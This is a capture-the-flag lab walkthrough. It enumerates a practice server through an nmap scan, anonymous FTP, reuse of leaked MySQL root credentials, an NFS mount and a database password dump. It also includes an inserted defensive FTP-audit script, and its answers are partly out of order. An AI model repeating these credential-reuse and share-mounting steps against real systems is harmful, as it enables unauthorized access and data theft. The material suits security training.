McSkidy has been happy with the progress they’ve been making, but there’s still so much to do. One of their main servers has some integral services running, but they can’t access these services. Did the Christmas Monster lock them out?
Deploy the machine and start scanning the IP. The machine may take a few minutes to boot up.
Check out the supporting material here: How to Mount an NFS Share in Linux.
Setup
```
nmap -sV -sC --script vuln
```
In the nmap result we can see that port 21/tcp (FTP, vsftpd 3.0.2) is open and that anonymous login is allowed.
```
kali@kali:~$ nmap -sV -sC 10.10.18.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 19:00 EDT
Nmap scan report for 10.10.18.184
Host is up (0.068s latency).
Not shown: 996 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 500 OOPS: invalid pasv_address
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.9.45.74
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
```
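As an added example (not part of this writeup or of the room), here is a small Python auditor that parses nmap's normal output like the scan above, groups the NSE script lines under the port they belong to, and flags the findings a defender would triage first: anonymous FTP login and cleartext control and data connections. The embedded sample is the port-21 section from the scan on this page; the finding strings and the `audit_ftp` helper are my own.

```python
import re

# Sample input: the port-21 section of the nmap -sV -sC scan shown in
# this writeup (host and client IPs as on the page), embedded as a constant.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.18.184
Host is up (0.068s latency).
Not shown: 996 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 500 OOPS: invalid pasv_address
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.9.45.74
|      Logged in as ftp
|      TYPE: ASCII
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
"""

# Matches the port table rows, e.g. "21/tcp open  ftp     vsftpd 3.0.2".
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Group nmap normal output into {port: {state, service, version, script}}."""
    ports = {}
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = f"{m.group(1)}/{m.group(2)}"
            ports[current] = {
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "script": [],
            }
        elif current and line.startswith("|"):
            # NSE script lines ("| ..." / "|_...") follow the port they describe.
            ports[current]["script"].append(line.lstrip("|_ ").strip())
    return ports


def audit_ftp(ports):
    """Return (port, finding) tuples for open FTP services with weak settings."""
    findings = []
    for port, info in ports.items():
        if info["service"] != "ftp" or info["state"] != "open":
            continue
        script = "\n".join(info["script"])
        if "Anonymous FTP login allowed" in script:
            findings.append((port, "anonymous FTP login enabled"))
        if "Control connection is plain text" in script:
            findings.append((port, "credentials sent in cleartext (no TLS)"))
        if "Data connections will be plain text" in script:
            findings.append((port, "file transfers in cleartext (no TLS)"))
    return findings


if __name__ == "__main__":
    for port, finding in audit_ftp(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print(f"{port}: {finding}")
```

For anything beyond a quick check, feed the script nmap's XML output (`-oX`) rather than the human-readable format, which changes between nmap versions.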
```
ftp 10.10.18.184
cred : anonymous
pass : none
```

```
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0              39 Dec 10 23:19 file.txt
drwxr-xr-x    2 0        0               6 Nov 04  2019 pub
d-wx-wx--x    2 14       50              6 Nov 04  2019 uploads
-rw-r--r--    1 0        0             224 Nov 04  2019 welcome.msg
226 Directory send OK.
```

```
ftp> get file.txt
local: file.txt remote: file.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for file.txt (39 bytes).
226 Transfer complete.
39 bytes received in 0.00 secs (507.8125 kB/s)
```

```
kali@kali:~$ cat file.txt
remember to wipe mysql:
root
ff912ABD*
```
#1 What is the password inside the creds.txt file? (hint: NFS)
After the setup we can connect to the MySQL database with the credentials found in file.txt.
```
mysql -h 10.10.18.184 -uroot -pff912ABD*
```
```
kali@kali:~$ mysql -h 10.10.18.184 -uroot -pff912ABD*
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 9
Server version: 5.7.28 MySQL Community Server (GPL)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| data               |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.095 sec)
```

```
MySQL [(none)]> use data;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [data]> show tables;
+----------------+
| Tables_in_data |
+----------------+
| USERS          |
+----------------+
1 row in set (0.077 sec)
```
```
kali@kali:~$ sudo showmount -e 10.10.18.184
Export list for 10.10.18.184:
/opt/files *
```

```
kali@kali:~$ sudo mount 10.10.18.184:/opt/files /tmp
kali@kali:~$ ls /tmp
creds.txt
kali@kali:~$ cat /tmp/creds.txt
the password is securepassword123
```
#2 What is the name of the file running on port 21?
```
kali@kali:~$ cat file.txt
remember to wipe mysql:
root
ff912ABD*
```
#3 What is the password after enumerating the database?
```
MySQL [data]> SELECT * FROM USERS;
+-------+--------------+
| name  | password     |
+-------+--------------+
| admin | bestpassword |
+-------+--------------+
1 row in set (0.067 sec)
```